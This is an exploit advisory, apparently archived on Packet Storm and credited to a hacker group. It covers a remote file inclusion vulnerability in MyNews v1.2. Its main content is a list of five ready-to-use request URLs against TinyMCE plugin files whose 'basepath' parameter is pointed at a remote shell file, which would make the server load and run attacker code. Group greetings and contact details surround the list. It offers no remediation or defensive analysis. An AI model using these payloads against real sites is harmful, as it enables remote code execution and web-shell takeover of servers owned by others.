MyNews version 1.2 suffers from a remote file inclusion vulnerability.
98473dea15460cad189a1cb641d82abda2afcb65692491f9e52168e5282a1d7bMyNews v1.2 Remote File Inclusion Vulnerability
<<!>> Found by : kurdish hackers team
<<!>> C0ntact : pshela [at] YaHoo .com
<<!>> Groups : Kurd-Team
<<!>> site : www.kurdteam.org
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> script :: MyNews v1.2
<<->> download script :: http://mynews.magtrb.com/
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> Exploit ::
>>> www.site/MyNews/includes/tiny_mce/plugins/filemanager/classes/FileManager/FileSystems/ZipFileImpl.php?basepath=[shell.txt?]
/MyNews/includes/tiny_mce/plugins/filemanager/classes/FileManager/FileManagerPlugin.php?basepath=[shell.txt?]
MyNews/includes/tiny_mce/plugins/filemanager/classes/FileSystems/RootFileImpl.php?basepath=[shell.txt?]
MyNews/includes/tiny_mce/plugins/imagemanager/classes/ImageManager/ImageManagerPlugin.php?basepath=[shell.txt?]
MyNews/includes/tiny_mce/plugins/filemanager/classes/CorePlugin.php?basepath= [shell.txt?]
=======================================================
<<->> All freinds , Zryan_kurd ,Root-SyS , all Member cold hackers team(cmg-team.com) , all kurdish hackers
=======================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed